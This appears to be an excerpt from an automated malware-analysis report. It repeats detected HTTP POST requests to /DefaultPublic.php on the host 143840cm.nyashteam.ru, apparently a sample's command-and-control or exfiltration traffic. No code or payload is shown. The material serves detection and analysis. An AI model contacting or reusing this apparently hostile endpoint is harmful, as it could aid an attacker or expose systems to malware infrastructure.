Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1760Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 162040Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1744Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1716Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1044Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1044Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1744Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1040Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /DefaultPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 143840cm.nyashteam.ruContent-Length: 1048Expect: 100-continueConnection: Keep-Alive
